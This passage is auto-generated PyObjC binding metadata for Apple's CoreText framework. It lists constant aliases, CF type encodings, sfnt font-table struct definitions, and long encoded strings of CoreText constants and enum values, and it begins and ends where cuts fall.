'kCTAdobeKorea1CharacterCollection': 'kCTCharacterCollectionAdobeKorea1', 'kCTFontNoFontType': 'kCTFontUIFontNone', 'kCTFontUserFixedPitchFontType': 'kCTFontUIFontUserFixedPitch', 'kCTCenterTextAlignment': 'kCTTextAlignmentCenter', 'kCTAdobeJapan2CharacterCollection': 'kCTCharacterCollectionAdobeJapan2', 'kCTFontSmallSystemFontType': 'kCTFontUIFontSmallSystem', 'kCTFontMonoSpaceTrait': 'kCTFontTraitMonoSpace', 'kFontLatvianLanguage': 'kFontLettishLanguage', 'kCTFontSansSerifClass': 'kCTFontClassSansSerif', 'kCTJustifiedTextAlignment': 'kCTTextAlignmentJustified', 'kFontPersianLanguage': 'kFontFarsiLanguage', 'kCTFontAlertHeaderFontType': 'kCTFontUIFontAlertHeader', 'kCTFontBoldTrait': 'kCTFontTraitBold', 'kFontLappishLanguage': 'kFontSaamiskLanguage', 'kCTFontSmallEmphasizedSystemFontType': 'kCTFontUIFontSmallEmphasizedSystem', 'kCTFontSymbolicClass': 'kCTFontClassSymbolic', 'kCTFontMenuItemCmdKeyFontType': 'kCTFontUIFontMenuItemCmdKey', 'kCTAdobeCNS1CharacterCollection': 'kCTCharacterCollectionAdobeCNS1', 'kCTFontCompositeTrait': 'kCTFontTraitComposite', 'kCTFontUnknownClass': 'kCTFontClassUnknown', 'kCTFontUIOptimizedTrait': 'kCTFontTraitUIOptimized', 'kCTFontClassMaskTrait': 'kCTFontTraitClassMask', 'kCTFontMenuItemFontType': 'kCTFontUIFontMenuItem', 'kCTAdobeJapan1CharacterCollection': 'kCTCharacterCollectionAdobeJapan1', 'kCTFontPushButtonFontType': 'kCTFontUIFontPushButton', 'kCTFontSystemFontType': 'kCTFontUIFontSystem', 'kFontEastEuropeanRomanScript': 'kFontSlavicScript', 'kCTFontSmallToolbarFontType': 'kCTFontUIFontSmallToolbar', 'kCTFontHorizontalOrientation': 'kCTFontOrientationHorizontal', 'kFontOromoLanguage': 'kFontGallaLanguage', 'kCTRightTextAlignment': 'kCTTextAlignmentRight', 'kFontAmharicScript': 'kFontGeezScript', 'kCTFontViewsFontType': 'kCTFontUIFontViews'} cftypes=[('CTFontCollectionRef', b'^{__CTFontCollection=}', 'CTFontCollectionGetTypeID', 'NSCTFontCollection'), ('CTFontDescriptorRef', b'^{__CTFontDescriptor=}', 'CTFontDescriptorGetTypeID', 'NSCTFontDescriptor'), ('CTFontRef', b'^{__CTFont=}', 'CTFontGetTypeID', 'NSCTFont'), ('CTFrameRef', b'^{__CTFrame=}', 'CTFrameGetTypeID', None), ('CTFramesetterRef', b'^{__CTFramesetter=}', 'CTFramesetterGetTypeID', None), ('CTGlyphInfoRef', b'^{__CTGlyphInfo=}', 'CTGlyphInfoGetTypeID', 'NSCTGlyphInfo'), ('CTLineRef', b'^{__CTLine=}', 'CTLineGetTypeID', None), ('CTParagraphStyleRef', b'^{__CTParagraphStyle=}', 'CTParagraphStyleGetTypeID', None), ('CTRubyAnnotationRef', b'^{__CTRubyAnnotation=}', None, None), ('CTRunDelegateRef', b'^{__CTRunDelegate=}', 'CTRunDelegateGetTypeID', None), ('CTRunRef', b'^{__CTRun=}', 'CTRunGetTypeID', None), ('CTTextTabRef', b'^{__CTTextTab=}', 'CTTextTabGetTypeID', None), ('CTTypesetterRef', b'^{__CTTypesetter=}', 'CTTypesetterGetTypeID', None)] expressions = {} # END OF FILE
# This file is generated by objective.metadata # # Last update: Sun Sep 29 13:08:51 2019 import objc, sys if sys.maxsize > 2 ** 32: def sel32or64(a, b): return b else: def sel32or64(a, b): return a misc = { } misc.update({'sfntInstance': objc.createStructType('sfntInstance', sel32or64(b'{sfntInstance=ss[1l]}', b'{sfntInstance=ss[1i]}'), ['nameID', 'flags', 'coord']), 'sfntFontDescriptor': objc.createStructType('sfntFontDescriptor', sel32or64(b'{sfntFontDescriptor=Ll}', b'{sfntFontDescriptor=Ii}'), ['name', 'value']), 'sfntCMapExtendedSubHeader': objc.createStructType('sfntCMapExtendedSubHeader', sel32or64(b'{sfntCMapExtendedSubHeader=SSLL}', b'{sfntCMapExtendedSubHeader=SSII}'), ['format', 'reserved', 'length', 'language']), 'sfntVariationAxis': objc.createStructType('sfntVariationAxis', sel32or64(b'{sfntVariationAxis=Llllss}', b'{sfntVariationAxis=Iiiiss}'), ['axisTag', 'minValue', 'defaultValue', 'maxValue', 'flags', 'nameID']), 'CTParagraphStyleSetting': objc.createStructType('CTParagraphStyleSetting', sel32or64(b'{CTParagraphStyleSetting=IL^v}', b'{CTParagraphStyleSetting=IQ^v}'), ['spec', 'valueSize', 'value']), 'sfntVariationHeader': objc.createStructType('sfntVariationHeader', sel32or64(b'{sfntVariationHeader=lSSSSSS[1{sfntVariationAxis=Llllss}][1{sfntInstance=ss[1l]}]}', b'{sfntVariationHeader=iSSSSSS[1{sfntVariationAxis=Iiiiss}][1{sfntInstance=ss[1i]}]}'), ['version', 'offsetToData', 'countSizePairs', 'axisCount', 'axisSize', 'instanceCount', 'instanceSize', 'axis', 'instance']), 'sfntDescriptorHeader': objc.createStructType('sfntDescriptorHeader', sel32or64(b'{sfntDescriptorHeader=ll[1{sfntFontDescriptor=Ll}]}', b'{sfntDescriptorHeader=ii[1{sfntFontDescriptor=Ii}]}'), ['version', 'descriptorCount', 'descriptor']), 'sfntDirectory': objc.createStructType('sfntDirectory', sel32or64(b'{sfntDirectory=LSSSS[1{sfntDirectoryEntry=LLLL}]}', b'{sfntDirectory=ISSSS[1{sfntDirectoryEntry=IIII}]}'), ['format', 'numOffsets', 'searchRange', 'entrySelector', 'rangeShift', 'table']), 'sfntFeatureName': objc.createStructType('sfntFeatureName', sel32or64(b'{sfntFeatureName=SSlSs}', b'{sfntFeatureName=SSiSs}'), ['featureType', 'settingCount', 'offsetToSettings', 'featureFlags', 'nameID']), 'sfntDirectoryEntry': objc.createStructType('sfntDirectoryEntry', sel32or64(b'{sfntDirectoryEntry=LLLL}', b'{sfntDirectoryEntry=IIII}'), ['tableTag', 'checkSum', 'offset', 'length']), 'sfntCMapEncoding': objc.createStructType('sfntCMapEncoding', sel32or64(b'{sfntCMapEncoding=SSL}', b'{sfntCMapEncoding=SSI}'), ['platformID', 'scriptID', 'offset']), 'sfntFontFeatureSetting': objc.createStructType('sfntFontFeatureSetting', b'{sfntFontFeatureSetting=Ss}', ['setting', 'nameID']), 'sfntFontRunFeature': objc.createStructType('sfntFontRunFeature', b'{sfntFontRunFeature=SS}', ['featureType', 'setting']), 'sfntCMapSubHeader': objc.createStructType('sfntCMapSubHeader', b'{sfntCMapSubHeader=SSS}', ['format', 'length', 'languageID']), 'sfntNameHeader': objc.createStructType('sfntNameHeader', b'{sfntNameHeader=SSS[1{sfntNameRecord=SSSSSS}]}', ['format', 'count', 'stringOffset', 'rec']), 'sfntCMapHeader': objc.createStructType('sfntCMapHeader', sel32or64(b'{sfntCMapHeader=SS[1{sfntCMapEncoding=SSL}]}', b'{sfntCMapHeader=SS[1{sfntCMapEncoding=SSI}]}'), ['version', 'numTables', 'encoding']), 'FontVariation': objc.createStructType('FontVariation', sel32or64(b'{FontVariation=Ll}', b'{FontVariation=Ii}'), ['name', 'value']), 'sfntFeatureHeader': objc.createStructType('sfntFeatureHeader', sel32or64(b'{sfntFeatureHeader=lSSl[1{sfntFeatureName=SSlSs}][1{sfntFontFeatureSetting=Ss}][1{sfntFontRunFeature=SS}]}', b'{sfntFeatureHeader=iSSi[1{sfntFeatureName=SSiSs}][1{sfntFontFeatureSetting=Ss}][1{sfntFontRunFeature=SS}]}'), ['version', 'featureNameCount', 'featureSetCount', 'reserved', 'names', 'settings', 'runs']), 'sfntNameRecord': objc.createStructType('sfntNameRecord', b'{sfntNameRecord=SSSSSS}', ['platformID', 'scriptID', 'languageID', 'nameID', 'length', 'offset'])}) constants = '''$kCTBackgroundColorAttributeName@^{__CFString=}$kCTBaselineClassAttributeName@^{__CFString=}$kCTBaselineClassHanging@^{__CFString=}$kCTBaselineClassIdeographicCentered@^{__CFString=}$kCTBaselineClassIdeographicHigh@^{__CFString=}$kCTBaselineClassIdeographicLow@^{__CFString=}$kCTBaselineClassMath@^{__CFString=}$kCTBaselineClassRoman@^{__CFString=}$kCTBaselineInfoAttributeName@^{__CFString=}$kCTBaselineOffsetAttributeName@^{__CFString=}$kCTBaselineOriginalFont@^{__CFString=}$kCTBaselineReferenceFont@^{__CFString=}$kCTBaselineReferenceInfoAttributeName@^{__CFString=}$kCTCharacterShapeAttributeName@^{__CFString=}$kCTFontAttributeName@^{__CFString=}$kCTFontBaselineAdjustAttribute@^{__CFString=}$kCTFontCascadeListAttribute@^{__CFString=}$kCTFontCharacterSetAttribute@^{__CFString=}$kCTFontCollectionDisallowAutoActivationOption@^{__CFString=}$kCTFontCollectionIncludeDisabledFontsOption@^{__CFString=}$kCTFontCollectionRemoveDuplicatesOption@^{__CFString=}$kCTFontCopyrightNameKey@^{__CFString=}$kCTFontDescriptionNameKey@^{__CFString=}$kCTFontDescriptorMatchingCurrentAssetSize@^{__CFString=}$kCTFontDescriptorMatchingDescriptors@^{__CFString=}$kCTFontDescriptorMatchingError@^{__CFString=}$kCTFontDescriptorMatchingPercentage@^{__CFString=}$kCTFontDescriptorMatchingResult@^{__CFString=}$kCTFontDescriptorMatchingSourceDescriptor@^{__CFString=}$kCTFontDescriptorMatchingTotalAssetSize@^{__CFString=}$kCTFontDescriptorMatchingTotalDownloadedSize@^{__CFString=}$kCTFontDesignerNameKey@^{__CFString=}$kCTFontDesignerURLNameKey@^{__CFString=}$kCTFontDisplayNameAttribute@^{__CFString=}$kCTFontDownloadableAttribute@^{__CFString=}$kCTFontDownloadedAttribute@^{__CFString=}$kCTFontEnabledAttribute@^{__CFString=}$kCTFontFamilyNameAttribute@^{__CFString=}$kCTFontFamilyNameKey@^{__CFString=}$kCTFontFeatureSampleTextKey@^{__CFString=}$kCTFontFeatureSelectorDefaultKey@^{__CFString=}$kCTFontFeatureSelectorIdentifierKey@^{__CFString=}$kCTFontFeatureSelectorNameKey@^{__CFString=}$kCTFontFeatureSelectorSettingKey@^{__CFString=}$kCTFontFeatureSettingsAttribute@^{__CFString=}$kCTFontFeatureTooltipTextKey@^{__CFString=}$kCTFontFeatureTypeExclusiveKey@^{__CFString=}$kCTFontFeatureTypeIdentifierKey@^{__CFString=}$kCTFontFeatureTypeNameKey@^{__CFString=}$kCTFontFeatureTypeSelectorsKey@^{__CFString=}$kCTFontFeaturesAttribute@^{__CFString=}$kCTFontFixedAdvanceAttribute@^{__CFString=}$kCTFontFormatAttribute@^{__CFString=}$kCTFontFullNameKey@^{__CFString=}$kCTFontLanguagesAttribute@^{__CFString=}$kCTFontLicenseNameKey@^{__CFString=}$kCTFontLicenseURLNameKey@^{__CFString=}$kCTFontMacintoshEncodingsAttribute@^{__CFString=}$kCTFontManagerBundleIdentifier@^{__CFString=}$kCTFontManagerErrorDomain@^{__CFString=}$kCTFontManagerErrorFontAssetNameKey@^{__CFString=}$kCTFontManagerErrorFontDescriptorsKey@^{__CFString=}$kCTFontManagerErrorFontURLsKey@^{__CFString=}$kCTFontManagerRegisteredFontsChangedNotification@^{__CFString=}$kCTFontManufacturerNameKey@^{__CFString=}$kCTFontMatrixAttribute@^{__CFString=}$kCTFontNameAttribute@^{__CFString=}$kCTFontOpenTypeFeatureTag@^{__CFString=}$kCTFontOpenTypeFeatureValue@^{__CFString=}$kCTFontOrientationAttribute@^{__CFString=}$kCTFontPostScriptCIDNameKey@^{__CFString=}$kCTFontPostScriptNameKey@^{__CFString=}$kCTFontPriorityAttribute@^{__CFString=}$kCTFontRegistrationScopeAttribute@^{__CFString=}$kCTFontRegistrationUserInfoAttribute@^{__CFString=}$kCTFontSampleTextNameKey@^{__CFString=}$kCTFontSizeAttribute@^{__CFString=}$kCTFontSlantTrait@^{__CFString=}$kCTFontStyleNameAttribute@^{__CFString=}$kCTFontStyleNameKey@^{__CFString=}$kCTFontSubFamilyNameKey@^{__CFString=}$kCTFontSymbolicTrait@^{__CFString=}$kCTFontTrademarkNameKey@^{__CFString=}$kCTFontTraitsAttribute@^{__CFString=}$kCTFontURLAttribute@^{__CFString=}$kCTFontUniqueNameKey@^{__CFString=}$kCTFontVariationAttribute@^{__CFString=}$kCTFontVariationAxisDefaultValueKey@^{__CFString=}$kCTFontVariationAxisHiddenKey@^{__CFString=}$kCTFontVariationAxisIdentifierKey@^{__CFString=}$kCTFontVariationAxisMaximumValueKey@^{__CFString=}$kCTFontVariationAxisMinimumValueKey@^{__CFString=}$kCTFontVariationAxisNameKey@^{__CFString=}$kCTFontVendorURLNameKey@^{__CFString=}$kCTFontVersionNameKey@^{__CFString=}$kCTFontWeightTrait@^{__CFString=}$kCTFontWidthTrait@^{__CFString=}$kCTForegroundColorAttributeName@^{__CFString=}$kCTForegroundColorFromContextAttributeName@^{__CFString=}$kCTFrameClippingPathsAttributeName@^{__CFString=}$kCTFramePathClippingPathAttributeName@^{__CFString=}$kCTFramePathFillRuleAttributeName@^{__CFString=}$kCTFramePathWidthAttributeName@^{__CFString=}$kCTFrameProgressionAttributeName@^{__CFString=}$kCTGlyphInfoAttributeName@^{__CFString=}$kCTHorizontalInVerticalFormsAttributeName@^{__CFString=}$kCTKernAttributeName@^{__CFString=}$kCTLanguageAttributeName@^{__CFString=}$kCTLigatureAttributeName@^{__CFString=}$kCTParagraphStyleAttributeName@^{__CFString=}$kCTRubyAnnotationAttributeName@^{__CFString=}$kCTRubyAnnotationScaleToFitAttributeName@^{__CFString=}$kCTRubyAnnotationSizeFactorAttributeName@^{__CFString=}$kCTRunDelegateAttributeName@^{__CFString=}$kCTStrokeColorAttributeName@^{__CFString=}$kCTStrokeWidthAttributeName@^{__CFString=}$kCTSuperscriptAttributeName@^{__CFString=}$kCTTabColumnTerminatorsAttributeName@^{__CFString=}$kCTTrackingAttributeName@^{__CFString=}$kCTTypesetterOptionAllowUnboundedLayout@^{__CFString=}$kCTTypesetterOptionDisableBidiProcessing@^{__CFString=}$kCTTypesetterOptionForcedEmbeddingLevel@^{__CFString=}$kCTUnderlineColorAttributeName@^{__CFString=}$kCTUnderlineStyleAttributeName@^{__CFString=}$kCTVerticalFormsAttributeName@^{__CFString=}$kCTWritingDirectionAttributeName@^{__CFString=}$''' enums = '''$cmapFontTableTag@1668112752$descriptorFontTableTag@1717859171$featureFontTableTag@1717920116$kANKRCurrentVersion@0$kAbbrevSquaredLigaturesOffSelector@15$kAbbrevSquaredLigaturesOnSelector@14$kAllCapsSelector@1$kAllLowerCaseSelector@2$kAllTypeFeaturesOffSelector@1$kAllTypeFeaturesOnSelector@0$kAllTypographicFeaturesType@0$kAltHalfWidthTextSelector@6$kAltProportionalTextSelector@5$kAlternateHorizKanaOffSelector@1$kAlternateHorizKanaOnSelector@0$kAlternateKanaType@34$kAlternateVertKanaOffSelector@3$kAlternateVertKanaOnSelector@2$kAnnotationType@24$kAsteriskToMultiplyOffSelector@3$kAsteriskToMultiplyOnSelector@2$kBSLNControlPointFormatNoMap@2$kBSLNControlPointFormatWithMap@3$kBSLNCurrentVersion@65536$kBSLNDistanceFormatNoMap@0$kBSLNDistanceFormatWithMap@1$kBSLNHangingBaseline@3$kBSLNIdeographicCenterBaseline@1$kBSLNIdeographicHighBaseline@5$kBSLNIdeographicLowBaseline@2$kBSLNLastBaseline@31$kBSLNMathBaseline@4$kBSLNNoBaseline@255$kBSLNNoBaselineOverride@255$kBSLNNumBaselineClasses@32$kBSLNRomanBaseline@0$kBSLNTag@1651731566$kBoxAnnotationSelector@1$kCJKItalicRomanOffSelector@3$kCJKItalicRomanOnSelector@2$kCJKItalicRomanSelector@1$kCJKRomanSpacingType@103$kCJKSymbolAltFiveSelector@5$kCJKSymbolAltFourSelector@4$kCJKSymbolAltOneSelector@1$kCJKSymbolAltThreeSelector@3$kCJKSymbolAltTwoSelector@2$kCJKSymbolAlternativesType@29$kCJKVerticalRomanCenteredSelector@0$kCJKVerticalRomanHBaselineSelector@1$kCJKVerticalRomanPlacementType@31$kCTAdobeCNS1CharacterCollection@1$kCTAdobeGB1CharacterCollection@2$kCTAdobeJapan1CharacterCollection@3$kCTAdobeJapan2CharacterCollection@4$kCTAdobeKorea1CharacterCollection@5$kCTCenterTextAlignment@2$kCTCharacterCollectionAdobeCNS1@1$kCTCharacterCollectionAdobeGB1@2$kCTCharacterCollectionAdobeJapan1@3$kCTCharacterCollectionAdobeJapan2@4$kCTCharacterCollectionAdobeKorea1@5$kCTCharacterCollectionIdentityMapping@0$kCTFontAlertHeaderFontType@18$kCTFontApplicationFontType@9$kCTFontBoldTrait@2$kCTFontClarendonSerifsClass@1073741824$kCTFontClassClarendonSerifs@1073741824$kCTFontClassFreeformSerifs@1879048192$kCTFontClassMaskShift@28$kCTFontClassMaskTrait@4026531840$kCTFontClassModernSerifs@805306368$kCTFontClassOldStyleSerifs@268435456$kCTFontClassOrnamentals@2415919104$kCTFontClassSansSerif@2147483648$kCTFontClassScripts@2684354560$kCTFontClassSlabSerifs@1342177280$kCTFontClassSymbolic@3221225472$kCTFontClassTransitionalSerifs@536870912$kCTFontClassUnknown@0$kCTFontCollectionCopyDefaultOptions@0$kCTFontCollectionCopyStandardSort@2$kCTFontCollectionCopyUnique@1$kCTFontColorGlyphsTrait@8192$kCTFontCompositeTrait@16384$kCTFontCondensedTrait@64$kCTFontControlContentFontType@26$kCTFontDefaultOrientation@0$kCTFontDescriptorMatchingDidBegin@0$kCTFontDescriptorMatchingDidFailWithError@8$kCTFontDescriptorMatchingDidFinish@1$kCTFontDescriptorMatchingDidFinishDownloading@6$kCTFontDescriptorMatchingDidMatch@7$kCTFontDescriptorMatchingDownloading@5$kCTFontDescriptorMatchingStalled@3$kCTFontDescriptorMatchingWillBeginDownloading@4$kCTFontDescriptorMatchingWillBeginQuerying@2$kCTFontEmphasizedSystemDetailFontType@20$kCTFontEmphasizedSystemFontType@3$kCTFontExpandedTrait@32$kCTFontFormatBitmap@5$kCTFontFormatOpenTypePostScript@1$kCTFontFormatOpenTypeTrueType@2$kCTFontFormatPostScript@4$kCTFontFormatTrueType@3$kCTFontFormatUnrecognized@0$kCTFontFreeformSerifsClass@1879048192$kCTFontHorizontalOrientation@1$kCTFontItalicTrait@1$kCTFontLabelFontType@10$kCTFontManagerAutoActivationDefault@0$kCTFontManagerAutoActivationDisabled@1$kCTFontManagerAutoActivationEnabled@2$kCTFontManagerAutoActivationPromptUser@3$kCTFontManagerErrorAlreadyRegistered@105$kCTFontManagerErrorCancelledByUser@304$kCTFontManagerErrorDuplicatedName@305$kCTFontManagerErrorExceededResourceLimit@106$kCTFontManagerErrorFileNotFound@101$kCTFontManagerErrorInUse@202$kCTFontManagerErrorInsufficientInfo@303$kCTFontManagerErrorInsufficientPermissions@102$kCTFontManagerErrorInvalidFilePath@306$kCTFontManagerErrorInvalidFontData@104$kCTFontManagerErrorMissingEntitlement@302$kCTFontManagerErrorNotRegistered@201$kCTFontManagerErrorRegistrationFailed@301$kCTFontManagerErrorSystemRequired@203$kCTFontManagerErrorUnrecognizedFormat@103$kCTFontManagerScopeNone@0$kCTFontManagerScopePersistent@2$kCTFontManagerScopeProcess@1$kCTFontManagerScopeSession@3$kCTFontManagerScopeUser@2$kCTFontMenuItemCmdKeyFontType@14$kCTFontMenuItemFontType@12$kCTFontMenuItemMarkFontType@13$kCTFontMenuTitleFontType@11$kCTFontMessageFontType@23$kCTFontMiniEmphasizedSystemFontType@7$kCTFontMiniSystemFontType@6$kCTFontModernSerifsClass@805306368$kCTFontMonoSpaceTrait@1024$kCTFontNoFontType@4294967295$kCTFontOldStyleSerifsClass@268435456$kCTFontOptionsDefault@0$kCTFontOptionsPreferSystemFont@4$kCTFontOptionsPreventAutoActivation@1$kCTFontOrientationDefault@0$kCTFontOrientationHorizontal@1$kCTFontOrientationVertical@2$kCTFontOrnamentalsClass@2415919104$kCTFontPaletteFontType@24$kCTFontPriorityComputer@30000$kCTFontPriorityDynamic@50000$kCTFontPriorityNetwork@20000$kCTFontPriorityProcess@60000$kCTFontPrioritySystem@10000$kCTFontPriorityUser@40000$kCTFontPushButtonFontType@16$kCTFontSansSerifClass@2147483648$kCTFontScriptsClass@2684354560$kCTFontSlabSerifsClass@1342177280$kCTFontSmallEmphasizedSystemFontType@5$kCTFontSmallSystemFontType@4$kCTFontSmallToolbarFontType@22$kCTFontSymbolicClass@3221225472$kCTFontSystemDetailFontType@19$kCTFontSystemFontType@2$kCTFontTableAcnt@1633906292$kCTFontTableAnkr@1634626418$kCTFontTableAvar@1635148146$kCTFontTableBASE@1111577413$kCTFontTableBdat@1650745716$kCTFontTableBhed@1651008868$kCTFontTableBloc@1651273571$kCTFontTableBsln@1651731566$kCTFontTableCBDT@1128416340$kCTFontTableCBLC@1128418371$kCTFontTableCFF@1128678944$kCTFontTableCFF2@1128678962$kCTFontTableCOLR@1129270354$kCTFontTableCPAL@1129333068$kCTFontTableCidg@1667851367$kCTFontTableCmap@1668112752$kCTFontTableCvar@1668702578$kCTFontTableCvt@1668707360$kCTFontTableDSIG@1146308935$kCTFontTableEBDT@1161970772$kCTFontTableEBLC@1161972803$kCTFontTableEBSC@1161974595$kCTFontTableFdsc@1717859171$kCTFontTableFeat@1717920116$kCTFontTableFmtx@1718449272$kCTFontTableFond@1718578788$kCTFontTableFpgm@1718642541$kCTFontTableFvar@1719034226$kCTFontTableGDEF@1195656518$kCTFontTableGPOS@1196445523$kCTFontTableGSUB@1196643650$kCTFontTableGasp@1734439792$kCTFontTableGlyf@1735162214$kCTFontTableGvar@1735811442$kCTFontTableHVAR@1213612370$kCTFontTableHdmx@1751412088$kCTFontTableHead@1751474532$kCTFontTableHhea@1751672161$kCTFontTableHmtx@1752003704$kCTFontTableHsty@1752396921$kCTFontTableJSTF@1246975046$kCTFontTableJust@1786082164$kCTFontTableKern@1801810542$kCTFontTableKerx@1801810552$kCTFontTableLTSH@1280594760$kCTFontTableLcar@1818452338$kCTFontTableLoca@1819239265$kCTFontTableLtag@1819566439$kCTFontTableMATH@1296127048$kCTFontTableMERG@1296388679$kCTFontTableMVAR@1297498450$kCTFontTableMaxp@1835104368$kCTFontTableMeta@1835365473$kCTFontTableMort@1836020340$kCTFontTableMorx@1836020344$kCTFontTableName@1851878757$kCTFontTableOS2@1330851634$kCTFontTableOpbd@1869636196$kCTFontTableOptionExcludeSynthetic@1$kCTFontTableOptionNoOptions@0$kCTFontTablePCLT@1346587732$kCTFontTablePost@1886352244$kCTFontTablePrep@1886545264$kCTFontTableProp@1886547824$kCTFontTableSTAT@1398030676$kCTFontTableSVG@1398163232$kCTFontTableSbit@1935829364$kCTFontTableSbix@1935829368$kCTFontTableTrak@1953653099$kCTFontTableVDMX@1447316824$kCTFontTableVORG@1448038983$kCTFontTableVVAR@1448493394$kCTFontTableVhea@1986553185$kCTFontTableVmtx@1986884728$kCTFontTableXref@2020762982$kCTFontTableZapf@1516335206$kCTFontToolTipFontType@25$kCTFontToolbarFontType@21$kCTFontTraitBold@2$kCTFontTraitClassMask@4026531840$kCTFontTraitColorGlyphs@8192$kCTFontTraitComposite@16384$kCTFontTraitCondensed@64$kCTFontTraitExpanded@32$kCTFontTraitItalic@1$kCTFontTraitMonoSpace@1024$kCTFontTraitUIOptimized@4096$kCTFontTraitVertical@2048$kCTFontTransitionalSerifsClass@536870912$kCTFontUIFontAlertHeader@18$kCTFontUIFontApplication@9$kCTFontUIFontControlContent@26$kCTFontUIFontEmphasizedSystem@3$kCTFontUIFontEmphasizedSystemDetail@20$kCTFontUIFontLabel@10$kCTFontUIFontMenuItem@12$kCTFontUIFontMenuItemCmdKey@14$kCTFontUIFontMenuItemMark@13$kCTFontUIFontMenuTitle@11$kCTFontUIFontMessage@23$kCTFontUIFontMiniEmphasizedSystem@7$kCTFontUIFontMiniSystem@6$kCTFontUIFontNone@4294967295$kCTFontUIFontPalette@24$kCTFontUIFontPushButton@16$kCTFontUIFontSmallEmphasizedSystem@5$kCTFontUIFontSmallSystem@4$kCTFontUIFontSmallToolbar@22$kCTFontUIFontSystem@2$kCTFontUIFontSystemDetail@19$kCTFontUIFontToolTip@25$kCTFontUIFontToolbar@21$kCTFontUIFontUser@0$kCTFontUIFontUserFixedPitch@1$kCTFontUIFontUtilityWindowTitle@17$kCTFontUIFontViews@8$kCTFontUIFontWindowTitle@15$kCTFontUIOptimizedTrait@4096$kCTFontUnknownClass@0$kCTFontUserFixedPitchFontType@1$kCTFontUserFontType@0$kCTFontUtilityWindowTitleFontType@17$kCTFontVerticalOrientation@2$kCTFontVerticalTrait@2048$kCTFontViewsFontType@8$kCTFontWindowTitleFontType@15$kCTFramePathFillEvenOdd@0$kCTFramePathFillWindingNumber@1$kCTFrameProgressionLeftToRight@2$kCTFrameProgressionRightToLeft@1$kCTFrameProgressionTopToBottom@0$kCTIdentityMappingCharacterCollection@0$kCTJustifiedTextAlignment@3$kCTLeftTextAlignment@0$kCTLineBoundsExcludeTypographicLeading@1$kCTLineBoundsExcludeTypographicShifts@2$kCTLineBoundsIncludeLanguageExtents@32$kCTLineBoundsUseGlyphPathBounds@8$kCTLineBoundsUseHangingPunctuation@4$kCTLineBoundsUseOpticalBounds@16$kCTLineBreakByCharWrapping@1$kCTLineBreakByClipping@2$kCTLineBreakByTruncatingHead@3$kCTLineBreakByTruncatingMiddle@5$kCTLineBreakByTruncatingTail@4$kCTLineBreakByWordWrapping@0$kCTLineTruncationEnd@1$kCTLineTruncationMiddle@2$kCTLineTruncationStart@0$kCTNaturalTextAlignment@4$kCTParagraphStyleSpecifierAlignment@0$kCTParagraphStyleSpecifierBaseWritingDirection@13$kCTParagraphStyleSpecifierCount@18$kCTParagraphStyleSpecifierDefaultTabInterval@5$kCTParagraphStyleSpecifierFirstLineHeadIndent@1$kCTParagraphStyleSpecifierHeadIndent@2$kCTParagraphStyleSpecifierLineBoundsOptions@17$kCTParagraphStyleSpecifierLineBreakMode@6$kCTParagraphStyleSpecifierLineHeightMultiple@7$kCTParagraphStyleSpecifierLineSpacing@10$kCTParagraphStyleSpecifierLineSpacingAdjustment@16$kCTParagraphStyleSpecifierMaximumLineHeight@8$kCTParagraphStyleSpecifierMaximumLineSpacing@14$kCTParagraphStyleSpecifierMinimumLineHeight@9$kCTParagraphStyleSpecifierMinimumLineSpacing@15$kCTParagraphStyleSpecifierParagraphSpacing@11$kCTParagraphStyleSpecifierParagraphSpacingBefore@12$kCTParagraphStyleSpecifierTabStops@4$kCTParagraphStyleSpecifierTailIndent@3$kCTRightTextAlignment@1$kCTRubyAlignmentAuto@0$kCTRubyAlignmentCenter@2$kCTRubyAlignmentDistributeLetter@4$kCTRubyAlignmentDistributeSpace@5$kCTRubyAlignmentEnd@3$kCTRubyAlignmentInvalid@255$kCTRubyAlignmentLineEdge@6$kCTRubyAlignmentStart@1$kCTRubyOverhangAuto@0$kCTRubyOverhangEnd@2$kCTRubyOverhangInvalid@255$kCTRubyOverhangNone@3$kCTRubyOverhangStart@1$kCTRubyPositionAfter@1$kCTRubyPositionBefore@0$kCTRubyPositionCount@4$kCTRubyPositionInline@3$kCTRubyPositionInterCharacter@2$kCTRunDelegateCurrentVersion@1$kCTRunDelegateVersion1@1$kCTRunStatusHasNonIdentityMatrix@4$kCTRunStatusNoStatus@0$kCTRunStatusNonMonotonic@2$kCTRunStatusRightToLeft@1$kCTTextAlignmentCenter@2$kCTTextAlignmentJustified@3$kCTTextAlignmentLeft@0$kCTTextAlignmentNatural@4$kCTTextAlignmentRight@1$kCTUnderlinePatternDash@512$kCTUnderlinePatternDashDot@768$kCTUnderlinePatternDashDotDot@1024$kCTUnderlinePatternDot@256$kCTUnderlinePatternSolid@0$kCTUnderlineStyleDouble@9$kCTUnderlineStyleNone@0$kCTUnderlineStyleSingle@1$kCTUnderlineStyleThick@2$kCTVersionNumber10_10@458752$kCTVersionNumber10_11@524288$kCTVersionNumber10_12@589824$kCTVersionNumber10_13@655360$kCTVersionNumber10_14@720896$kCTVersionNumber10_15@786432$kCTVersionNumber10_5@131072$kCTVersionNumber10_5_2@131073$kCTVersionNumber10_5_3@131074$kCTVersionNumber10_5_5@131075$kCTVersionNumber10_6@196608$kCTVersionNumber10_6_7@196615$kCTVersionNumber10_7@262144$kCTVersionNumber10_8@327680$kCTVersionNumber10_9@393216$kCTWritingDirectionEmbedding@0$kCTWritingDirectionLeftToRight@0$kCTWritingDirectionNatural@-1$kCTWritingDirectionOverride@2$kCTWritingDirectionRightToLeft@1$kCanonicalCompositionOffSelector@1$kCanonicalCompositionOnSelector@0$kCaseSensitiveLayoutOffSelector@1$kCaseSensitiveLayoutOnSelector@0$kCaseSensitiveLayoutType@33$kCaseSensitiveSpacingOffSelector@3$kCaseSensitiveSpacingOnSelector@2$kCharacterAlternativesType@17$kCharacterShapeType@20$kCircleAnnotationSelector@3$kCommonLigaturesOffSelector@3$kCommonLigaturesOnSelector@2$kCompatibilityCompositionOffSelector@3$kCompatibilityCompositionOnSelector@2$kContextualAlternatesOffSelector@1$kContextualAlternatesOnSelector@0$kContextualAlternatesType@36$kContextualLigaturesOffSelector@19$kContextualLigaturesOnSelector@18$kContextualSwashAlternatesOffSelector@5$kContextualSwashAlternatesOnSelector@4$kCursiveConnectionType@2$kCursiveSelector@2$kDecomposeDiacriticsSelector@2$kDecorativeBordersSelector@4$kDefaultCJKRomanSelector@2$kDefaultLowerCaseSelector@0$kDefaultUpperCaseSelector@0$kDesignComplexityType@18$kDesignLevel1Selector@0$kDesignLevel2Selector@1$kDesignLevel3Selector@2$kDesignLevel4Selector@3$kDesignLevel5Selector@4$kDiacriticsType@9$kDiagonalFractionsSelector@2$kDiamondAnnotationSelector@8$kDingbatsSelector@1$kDiphthongLigaturesOffS